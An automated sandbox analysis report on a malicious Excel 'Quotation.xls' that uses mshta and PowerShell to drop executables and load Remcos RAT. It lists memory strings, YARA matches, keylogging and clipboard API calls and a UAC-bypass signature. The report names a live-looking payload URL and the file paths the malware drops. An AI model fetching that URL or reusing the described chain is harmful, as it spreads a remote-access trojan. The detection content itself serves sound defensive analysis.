            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru8
            Source: InstallUtil.exe, 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: winiti.exe, 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 00000007.00000002.449435147.00000000039AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449435147.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
            Source: powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 00000007.00000002.449435147.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/
            Source: mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.0000000000265000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/jjJsPX
            Source: Quotation.xls, 37330000.0.drString found in binary or memory: http://tny.wtf/jjJsPX0
            Source: mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/jjJsPXM
            Source: mshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/jjJsPXa
            Source: mshta.exe, 00000004.00000002.426650373.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/jjJsPXdO
            Source: mshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tny.wtf/jjJsPXe
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: winiti.exe, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.drString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: winiti.exeString found in binary or memory: https://aka.ms/nativeaot-c
            Source: winiti.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: winiti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityX
            Source: csrss[1].exe.7.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: winiti.exe, 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000000.447217263.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000002.451807346.0000000143000000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000025_2_0040A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,25_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,25_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,25_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,25_2_0040A3E0
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Excel sheet contains many unusual embedded objects
            Source: Quotation.xlsOLE: Microsoft Excel 2007+
            Source: ~DF91B6A489623540E3.TMP.0.drOLE: Microsoft Excel 2007+
            Source: 37330000.0.drOLE: Microsoft Excel 2007+
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].htaJump to behavior
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,25_2_004167B4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89AC352E7_2_000007FE89AC352E
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE0075011_2_000000013FE00750
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDFED0011_2_000000013FDFED00
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDFC35011_2_000000013FDFC350
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE914011_2_000000013FDE9140
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDEFF9011_2_000000013FDEFF90
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDF8F3011_2_000000013FDF8F30
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDFDE2011_2_000000013FDFDE20
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDFF55011_2_000000013FDFF550
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDEE4E011_2_000000013FDEE4E0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE0248011_2_000000013FE02480
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE2C5011_2_000000013FDE2C50
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE6BB611_2_000000013FDE6BB6
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE08BC011_2_000000013FE08BC0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDF8AB011_2_000000013FDF8AB0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDEF9E411_2_000000013FDEF9E4
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE019F011_2_000000013FE019F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE8416011_2_000000013FE84160
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE0416011_2_000000013FE04160
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE028F011_2_000000013FE028F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE391011_2_000000013FDE3910
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDD80B011_2_000000013FDD80B0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE037F011_2_000000013FE037F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F62075022_2_000000013F620750
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F61ED0022_2_000000013F61ED00
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F61C35022_2_000000013F61C350
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F60914022_2_000000013F609140
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F618F3022_2_000000013F618F30
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F60FF9022_2_000000013F60FF90
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F61DE2022_2_000000013F61DE20
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F61F55022_2_000000013F61F550
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F602C5022_2_000000013F602C50
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F60E4E022_2_000000013F60E4E0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F62248022_2_000000013F622480
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F606BB622_2_000000013F606BB6
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F628BC022_2_000000013F628BC0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F60F9E422_2_000000013F60F9E4
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F6219F022_2_000000013F6219F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F618AB022_2_000000013F618AB0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F6A416022_2_000000013F6A4160
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F62416022_2_000000013F624160
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F60391022_2_000000013F603910
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F6228F022_2_000000013F6228F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F6237F022_2_000000013F6237F0
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F5F80B022_2_000000013F5F80B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043E0CC25_2_0043E0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041F0FA25_2_0041F0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045415925_2_00454159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043816825_2_00438168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004461F025_2_004461F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043E2FB25_2_0043E2FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045332B25_2_0045332B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0042739D25_2_0042739D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004374E625_2_004374E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043E55825_2_0043E558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043877025_2_00438770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004378FE25_2_004378FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043394625_2_00433946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0044D9C925_2_0044D9C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00427A4625_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041DB6225_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00427BAF25_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00437D3325_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00435E5E25_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00426E0E25_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043DE9D25_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00413FCA25_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00436FEA25_2_00436FEA
            Source: Quotation.xlsOLE indicator, VBA macros: true
            Source: ~DF91B6A489623540E3.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 000000013F5F9D50 appears 51 times
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 000000013FDD9D50 appears 51 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
